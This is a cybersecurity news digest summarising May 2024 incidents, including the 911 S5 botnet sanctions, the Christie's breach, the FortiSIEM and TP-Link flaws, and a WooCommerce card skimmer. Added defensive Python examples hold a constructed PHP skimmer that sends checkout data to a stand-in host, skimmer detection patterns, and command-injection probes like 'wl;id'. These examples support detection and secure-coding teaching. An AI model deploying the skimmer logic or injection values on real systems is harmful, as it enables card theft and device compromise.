Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11822
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2024-05-28 19:14:59 | bleepingcomputer | CYBERCRIME | US Sanctions Cybercriminals Behind Massive Global 911 S5 Botnet | The U.S. Treasury Department imposed sanctions on a cybercrime network that included three Chinese nationals and three companies based in Thailand.
The network operated the 911 S5 botnet, controlling around 120,000 residential proxy nodes globally via malware distributed through a free VPN service.
The Office of Foreign Assets Control (OFAC) described the 911 S5 service as a means for cybercriminals to mask their activities using the infected IP addresses of unsuspecting victims.
This botnet allowed criminals to commit extensive fraud, including filing tens of thousands of deceptive applications for COVID-19 relief funds, resulting in billions of dollars in losses.
The botnet's compromised IP addresses were also used in a series of bomb threats across the U.S. in July 2022.
Individuals sanctioned include Yunhe Wang, the botnet administrator; Jingping Liu, responsible for laundering proceeds; and Yanni Zheng, a legal representative.
The sanctions block any property of the designated parties that is in the U.S. or held by U.S. persons, prohibit U.S. persons from transacting with them, and warn that anyone who deals with the designated parties risks further sanctions or enforcement action.
The announcement coincided with reports of Chinese state hackers increasingly using compromised proxy servers and virtual private servers to conduct espionage, avoiding detection. | Details |
| 2024-05-28 19:04:26 | bleepingcomputer | CYBERCRIME | U.S. Sanctions Chinese-Led Cybercrime Gang for Operating Botnet | The U.S. Treasury Department imposed sanctions on three Chinese nationals and three Thailand-based entities linked to the 911 S5 botnet.
This botnet, which compromised approximately 19 million IP addresses worldwide, was used to conduct cybercrimes, including significant fraud related to U.S. relief programs.
Victims were tricked into downloading malware by a spoofed VPN service which then added their devices to the botnet, using their IP addresses for criminal activities.
Attacks attributed to 911 S5 users included widespread fraud and bomb threats across the United States.
The Office of Foreign Assets Control (OFAC) has identified and sanctioned individuals and companies involved, freezing their assets and prohibiting transactions with U.S. entities.
The sanctions aim to disrupt the operations of the botnet, which allowed cybercriminals to anonymize their illegal online activities by routing them through victims’ computers.
Cybersecurity firm Mandiant has reported that similar tactics are being adopted by Chinese state hackers, further complicating the cyber threat landscape. | Details |
| 2024-05-28 18:48:59 | theregister | DATA BREACH | BreachForums Resurfaces Post FBI Seizure Under New Management | BreachForums, a notorious hacking forum used to trade stolen data, is operational again weeks after an FBI-led shutdown.
The site is reportedly now managed by ShinyHunters, a group previously involved in its administration.
Following the May 15 takedown, the FBI controlled the site's domains and displayed seizure notices on the website and its Telegram channel.
Despite the apprehension of other admins, ShinyHunters claims no arrests among its members and successfully regained control of the site's domains.
There has been no formal comment from the FBI or the US Department of Justice about the takedown or the site's reappearance.
BreachForums has continually posed challenges to law enforcement, persistently reemerging even after high-profile shutdowns.
Expert commentary suggests that completely dismantling such organized online criminal operations involves capturing all associated personnel and securing all technological and financial networks. | Details |
| 2024-05-28 18:33:21 | bleepingcomputer | CYBERCRIME | Russian Hacker Indicted for Selling U.S. Corporate Network Access | Evgeniy Doroshenko, a 31-year-old Russian national, has been indicted in the U.S. for wire and computer fraud from February 2019 to May 2024.
Doroshenko operated as an "initial access broker," infiltrating corporate networks and then selling access to these networks on Russian cybercrime forums.
He used the online aliases "FlankerWWH" and "Flanker" to carry out his operations, often utilizing brute-force attacks on Remote Desktop Protocol services.
One highlighted case involved offering access to a New Jersey company's network with bids starting at $3,000 and a "buy now" price of $6,000.
The indictment includes an instance where Doroshenko extracted data valued over $5,000 from one of the compromised systems.
The wire fraud count carries up to 20 years in prison and a $250,000 fine; the computer fraud count carries up to five years and a similar fine.
Doroshenko remains at large, likely in Russia, raising doubts about the feasibility of his extradition and arrest. | Details |
| 2024-05-28 18:02:37 | bleepingcomputer | NATION STATE ACTIVITY | North Korean Hackers Employ New FakePenny Ransomware in Cyber Attacks | Microsoft has identified the North Korean hacking group, Moonstone Sleet, as the orchestrator behind the FakePenny ransomware, demanding millions in ransom.
Moonstone Sleet initially overlapped heavily with another North Korean group, Diamond Sleet, but has since built its own infrastructure and tooling.
The group gains access through trojanized software, fake companies and social-media personas; having previously focused on espionage, it now also pursues financial extortion.
The latest ransomware attacks show a significant increase in ransom demands, up to $6.6 million, indicating a shift towards large-scale financial gains.
The tactics employed by Moonstone Sleet represent a broader trend of evolving capabilities among North Korean cyber groups, aiming to meet state-sponsored cyber objectives and potentially disrupt international targets.
Historical context underscores the continuity and escalation of North Korean state-sponsored attacks, from WannaCry (attributed to Lazarus) to the Maui ransomware (attributed to Andariel) and the H0lyGh0st ransomware operation. | Details |
| 2024-05-28 16:51:07 | theregister | MISCELLANEOUS | SpiderOak One Struggles Post-Datacenter Upgrade, Frustrates Users | SpiderOak One experienced significant service disruptions following a datacenter upgrade on April 24, affecting its encrypted backup solution primarily used for ransomware protection.
Many users, some with subscriptions spanning a decade, reported inability to back up data and expressed intentions to cancel their subscriptions despite ongoing payments.
SpiderOak has been actively issuing refunds and reimbursing customers for unused subscription months while their services are not fully operational.
Customer frustrations grew due to poor communication about the duration of service disruptions and delayed email responses from support.
Despite the company's claim of nearing full operational status at 99% functionality, user reports suggest ongoing issues with reliability and account billing inconsistencies.
Support was temporarily moved to the company's X account after the migration broke its support ticketing system.
SpiderOak attributes the migration to a necessary step for improving data redundancy, scalability, and disaster recovery, and states it is close to restoring full service.
The remaining issue involves a specific cluster requiring more attention due to its unique architecture; SpiderOak denies hardware failure as a cause. | Details |
| 2024-05-28 16:19:53 | bleepingcomputer | MALWARE | Critical Fortinet RCE Vulnerability PoC Released, Urgent Patch Advised | Security researchers at Horizon3 revealed a proof-of-concept (PoC) exploit for a critical command injection vulnerability in Fortinet’s SIEM solution.
The vulnerability, tracked as CVE-2024-23108, allows unauthenticated remote command execution as root and affects FortiSIEM 6.4.0 through 7.1.1; Fortinet's advisory lists fixed releases for each branch, including 7.1.2.
Fortinet initially treated the report as a duplicate of a previously fixed issue, CVE-2023-34992, before acknowledging it as a distinct bypass of that fix.
Fortinet patched it together with a second flaw, CVE-2024-23109, on February 8, after initially dismissing both as duplicates.
The PoC exploit enables attackers to execute unauthorized commands on unpatched FortiSIEM appliances, potentially gaining full control.
Horizon3 Attack Team also disclosed a PoC for a critical flaw in Fortinet's FortiClient EMS, which is currently being exploited in the wild.
Fortinet systems have been targeted in recent cyberattacks, including the use of their vulnerabilities for deploying malware in corporate and government networks. | Details |
| 2024-05-28 16:14:31 | bleepingcomputer | DATA BREACH | Christie's Auction House Hit by RansomHub Data Breach Incident | Christie's confirmed a data breach after the RansomHub extortion gang claimed to have stolen sensitive client data.
The breach occurred earlier this month, with the ransomware group threatening to leak the data if not compensated.
RansomHub listed Christie's on its dark web extortion page, demanding ransom and threatening GDPR fines.
The attack compromised personal details of approximately 500,000 clients but did not affect financial or transaction records.
Christie's secured its systems and took its website offline to contain the incident.
The company is actively notifying affected clients and relevant regulators and government agencies about the breach.
Despite being labeled a ransomware group, RansomHub primarily executes data theft and extortion without using an encryptor.
Christie's historical significance and high-profile auction sales highlight the potential impact and visibility of the breach. | Details |
| 2024-05-28 13:35:35 | theregister | CYBERCRIME | Christie’s Hit by Ransomware Attack; Client Data Stolen | Christie's auction house confirmed a data theft following an online ransomware attack by the RansomHub group.
The attackers claimed to have stolen personal data of over 500,000 Christie's clients and provided a seven-day deadline for ransom payment.
Christie's had previously experienced a disruption described as a “technology security issue” which took their online bidding system offline.
The auction house took immediate action by taking their website offline and conducting an investigation which confirmed unauthorized access to their network.
No financial or transactional records were reported compromised but limited client personal data was accessed.
Christie's has contacted privacy regulators and government agencies and is in the process of notifying affected clients.
The company has refused to meet the ransom demands, aligning with strategies to not comply with extortion to discourage future attacks despite potential data exposure risks. | Details |
| 2024-05-28 12:54:32 | thehackernews | CYBERCRIME | Indian National Guilty in Massive $37 Million Cryptocurrency Scam | Chirag Tomar pleaded guilty to a wire fraud conspiracy involving over $37 million in cryptocurrency theft from unsuspecting victims globally and in the United States.
The fraudulent operation consisted of a fake website, "CoinbasePro[.]com," deliberately designed to mimic the genuine cryptocurrency exchange platform, Coinbase Pro.
Tomar and accomplices impersonated Coinbase customer service to obtain two-factor authentication codes from victims, enabling unauthorized access and theft of cryptocurrency from their legitimate Coinbase accounts.
The stolen cryptocurrencies were transferred to wallets controlled by the fraudsters, converted into other digital currencies or moved to different wallets, and cashed out to fund a luxurious lifestyle, including high-end cars and international trips.
Tomar was arrested as he entered the U.S. on December 20, 2023; he faces up to 20 years in prison and a $250,000 fine at sentencing.
The plea follows other recent prosecutions, including a scheme that helped North Korean IT workers fraudulently obtain jobs at U.S. companies, generating revenue for North Korea's weapons of mass destruction program in violation of international sanctions.
This sequence of events underlines an ongoing global challenge with cryptocurrency theft and fraudulent schemes, showcasing significant international and multilateral cybersecurity threats. | Details |
| 2024-05-28 11:17:22 | thehackernews | MISCELLANEOUS | Effective Security Strategies for Business-Critical Assets | Identifying and securing business-critical assets is crucial for cybersecurity and organizational success.
A strategic approach includes mapping business processes to their underlying technology assets.
Gartner's continuous threat exposure management (CTEM) framework helps focus remediation on the exposures whose removal has the greatest impact.
Prioritizing issues related to business-critical assets aligns security initiatives with executive concerns and business objectives.
Implementing security measures should start from the most significant areas and use detailed risk assessments and stakeholder input for prioritization.
Tools such as vulnerability management solutions or penetration test results are essential to identify and prioritize remediation actions.
Focusing on business-critical assets not only secures them but also optimizes the company’s use of resources, enhancing overall business performance.
Aligning security measures with business goals demonstrably supports business process continuity and meets executive expectations. | Details |
| 2024-05-28 10:26:14 | thehackernews | DDOS | Researchers Expose New DDoS Attack Techniques and Botnet Threats | The CatDDoS botnet exploits more than 80 known vulnerabilities to compromise devices and enlist them in DDoS attacks.
CatDDoS, a Mirai variant, supports UDP, TCP and other flood methods and mainly targets devices in China and the U.S.
Compromised devices include a wide range of routers and networking equipment from major brands like Cisco, Huawei, and NETGEAR.
Attackers encrypt communications with C2 servers using the ChaCha20 algorithm and employ OpenNIC domains for evasion.
Despite the suspected shutdown of the original CatDDoS operation in December 2023, its source code was sold, leading to new botnet variants.
Newly disclosed DNSBomb attack exploits DNS features for a pulsing denial-of-service with an amplification factor of 20,000x, but major DNS software BIND is not vulnerable.
DNSBomb combines IP spoofing, an attacker-controlled authoritative server that deliberately delays its answers, and resolvers' query timeout and response aggregation behaviour so that many accumulated responses are released toward the spoofed victim as a single burst, which is hard to detect and mitigate. | Details |
| 2024-05-28 08:33:58 | theregister | CYBERCRIME | ARPA-H Initiates UPGRADE Project to Enhance Cybersecurity in Healthcare | ARPA-H, inspired by DARPA, focuses on neglected yet crucial areas in health science and technology to produce impactful, sustainable innovations.
The UPGRADE project, recently launched by ARPA-H, aims to develop automated systems for detecting vulnerabilities and managing patches in healthcare IT.
UPGRADE uses a "digital twin" model to safely experiment and refine cybersecurity measures on a mirrored system without risking the primary system.
The initiative seeks to establish a form of "digital immunology," drawing parallels between biological immune responses and cybersecurity defenses.
Despite the potential benefits, the project faces significant challenges, including the complexity of creating accurate digital twins of intricate systems and the inconsistency in patch management and testing.
The project emphasizes collaboration with open source communities to foster a more universally secure IT environment, potentially revolutionizing cybersecurity practices across industries.
UPGRADE's success could lead to widespread adoption and improve systemic security, but it also confronts an industry reluctant to embrace necessary changes for enhanced security. | Details |
| 2024-05-28 06:36:47 | thehackernews | MALWARE | WordPress Plugin Exploited to Steal Credit Card Info on E-commerce Sites | Unknown attackers are abusing the Dessky Snippets WordPress plugin to inject malicious PHP code into e-commerce sites and steal credit card data.
Sucuri flagged the activity on May 11, 2024; the plugin has around 200 active installations.
The attackers are using manipulated checkout processes in WooCommerce to insert additional fields in billing forms, asking for sensitive credit card information.
The captured data, including names, card numbers, expiry dates and CVV numbers, is exfiltrated to a server the attackers control.
The attackers disable autocomplete on the injected fields, which keeps the browser from autofilling them and avoids warnings that could alert the shopper.
Previous exploits in similar veins have involved other WordPress plugins, such as WPCode and Simple Custom CSS and JS, targeting over 39,000 sites in recent campaigns.
Website owners are advised to update their sites and plugins regularly, use robust passwords, and routinely check for signs of unauthorized alterations and malware. | Details |
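A heuristic scan for the skimmer pattern described in the Dessky Snippets item, as an added example that is not Sucuri's or the plugin's code. It runs over PHP snippet text such as a code-snippets plugin stores in the database. The two snippets are constructed for the example; the indicator regexes and the triage rule are assumptions a defender would tune to their own site (the hook names `woocommerce_billing_fields`, `woocommerce_checkout_fields` and `woocommerce_checkout_update_order_meta` are real WooCommerce hooks).

```python
import re
from typing import Dict, List

# Constructed sample: a benign checkout tweak a site owner might store in a
# snippets plugin, and a malicious one that does what the article describes
# (extra card fields on the billing form, autocomplete off, exfiltration).
BENIGN_SNIPPET = r'''
add_filter('woocommerce_checkout_fields', function ($fields) {
    $fields['order']['order_comments']['placeholder'] = 'Delivery notes';
    return $fields;
});
'''

MALICIOUS_SNIPPET = r'''
add_filter('woocommerce_billing_fields', function ($fields) {
    $fields['billing_card_number'] = array('label' => 'Card number', 'required' => true,
        'custom_attributes' => array('autocomplete' => 'off'));
    $fields['billing_card_cvv'] = array('label' => 'CVV', 'required' => true,
        'custom_attributes' => array('autocomplete' => 'off'));
    return $fields;
});
add_action('woocommerce_checkout_update_order_meta', function ($order_id) {
    $payload = http_build_query($_POST);
    $ch = curl_init('https://example.invalid/collect.php');
    curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    curl_exec($ch);
});
'''

# Assumed indicators: each is a weak signal on its own; the combination matters.
INDICATORS = {
    # code that reshapes the checkout/billing form
    "checkout_hook": re.compile(
        r"woocommerce_(billing|checkout)_fields|woocommerce_after_checkout_billing_form"),
    # payment-card vocabulary in field names or labels
    "card_field": re.compile(r"card[_ ]?(number|num|no)|\bcvv\b|\bcvc\b|expir", re.I),
    # autofill suppressed on a form field
    "autocomplete_off": re.compile(
        r"autocomplete['\"]?\s*(=>|=|:)\s*['\"]?(off|new-password)", re.I),
    # raw access to the submitted form
    "raw_post_capture": re.compile(r"\$_POST\b"),
    # outbound HTTP from checkout-time code
    "outbound_request": re.compile(
        r"curl_init\s*\(|wp_remote_post\s*\(|file_get_contents\s*\(\s*['\"]https?://", re.I),
}


def scan_snippet(php: str) -> Dict[str, List[int]]:
    """Return {indicator_name: [1-based line numbers]} for every indicator hit."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(php.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def classify(php: str) -> str:
    """Assumed triage rule: a checkout hook together with card vocabulary or an
    outbound request is treated as a likely skimmer; any other hit is queued
    for manual review; no hits is clean."""
    hits = scan_snippet(php)
    if "checkout_hook" in hits and ("card_field" in hits or "outbound_request" in hits):
        return "likely-skimmer"
    if hits:
        return "review"
    return "clean"


if __name__ == "__main__":
    for label, php in (("benign", BENIGN_SNIPPET), ("malicious", MALICIOUS_SNIPPET)):
        print(label, classify(php), scan_snippet(php))
```

The benign snippet lands in "review" rather than "clean" because it touches the checkout form at all; that is deliberate, since a stored snippet that alters checkout is exactly what an owner should eyeball after an incident like this. Run the scan over every stored snippet and every modified theme or plugin file, not only over the Dessky Snippets table.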
| 2024-05-28 05:15:07 | thehackernews | CYBERCRIME | Severe Security Flaw Found in TP-Link Gaming Router | A critical vulnerability in the TP-Link Archer C5400X gaming router allows for remote code execution.
The flaw, identified as CVE-2024-5035, received the highest severity rating with a CVSS score of 10.0.
All firmware versions up to 1_1.1.6 are affected; patch available in version 1_1.1.7.
The flaw is in the router's RF testing binary, which is reachable over the network and applies only a superficial restriction to the commands it accepts before handing them to a shell; shell metacharacters such as ';' let an attacker chain an arbitrary command onto an accepted one.
The vulnerability was disclosed by German cybersecurity firm ONEKEY, which pointed to the risk of shipping test and debug interfaces in production firmware.
TP-Link's fix rejects commands containing special characters; a character denylist is a narrower fix than taking the shell out of the path, so the service should also not be reachable from untrusted networks.
Recent disclosures of unpatched vulnerabilities in other devices stress the need for secure network interface configurations. | Details |
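The command-gating bug class from the TP-Link item, as an added example that is not TP-Link's or ONEKEY's code. It contrasts three gates for a network-reachable test interface: a check on the start of the string followed by a shell (vulnerable), a metacharacter denylist (the vendor-style fix, still fragile), and an argv allowlist executed without a shell (the robust fix). The allowed keywords, the denylist contents and the program paths are assumptions for the example; the shell is modelled rather than invoked so attacker input never actually runs.

```python
import shlex
import subprocess
from typing import List, Optional

# Assumption: the test interface is meant to expose only these two helper tools.
ALLOWED_KEYWORDS = ("wl", "nvram")
# Assumption: a typical "special character" denylist. Note it omits newline.
SHELL_META = set(";|&$`<>()\\\"'")
# Assumption: absolute paths the robust gate is allowed to execute.
ALLOWED_PROGRAMS = {"wl": "/usr/sbin/wl", "nvram": "/usr/sbin/nvram"}


def shell_would_run(cmdline: str) -> List[str]:
    """Model what /bin/sh does with the string: split it into separate commands
    on ';' and newline (a subset of sh's separators). Nothing is executed."""
    return [c.strip() for c in cmdline.replace("\n", ";").split(";") if c.strip()]


def vulnerable_gate(cmdline: str) -> Optional[List[str]]:
    """Check the start of the raw string, then hand the whole string to a shell.
    'wl;id' passes the check and the shell runs 'wl' and then 'id'."""
    if not cmdline.startswith(ALLOWED_KEYWORDS):
        return None
    return shell_would_run(cmdline)


def denylist_gate(cmdline: str) -> Optional[List[str]]:
    """Vendor-style fix: additionally refuse any denylisted character. This
    stops 'wl;id', but any separator missing from the list still gets through."""
    if not cmdline.startswith(ALLOWED_KEYWORDS) or SHELL_META & set(cmdline):
        return None
    return shell_would_run(cmdline)


def allowlist_argv(cmdline: str) -> Optional[List[str]]:
    """Robust fix: tokenise the way a shell would, require argv[0] to be an
    allowlisted program, and return an argv for execv(). No shell is involved,
    so separators and substitutions are just bytes inside an argument."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        return None
    return [ALLOWED_PROGRAMS[argv[0]], *argv[1:]]


def run_allowlisted(cmdline: str) -> Optional[subprocess.CompletedProcess]:
    """Execute through the robust gate with shell=False (paths are assumptions,
    so this only succeeds on a system that actually has those binaries)."""
    argv = allowlist_argv(cmdline)
    if argv is None:
        return None
    return subprocess.run(argv, shell=False, capture_output=True, text=True)


if __name__ == "__main__":
    for probe in ("wl;id", "wl\nid", "nvram get wl0_ssid", "id"):
        print(repr(probe), vulnerable_gate(probe), denylist_gate(probe), allowlist_argv(probe))
```

The newline probe is the point of the comparison: the denylist gate rejects `wl;id` but lets `wl\nid` through to the shell as two commands, whereas the argv gate turns the same input into `wl` with the argument `id`, which is harmless. Denylists of characters chase the shell's grammar; removing the shell ends the chase.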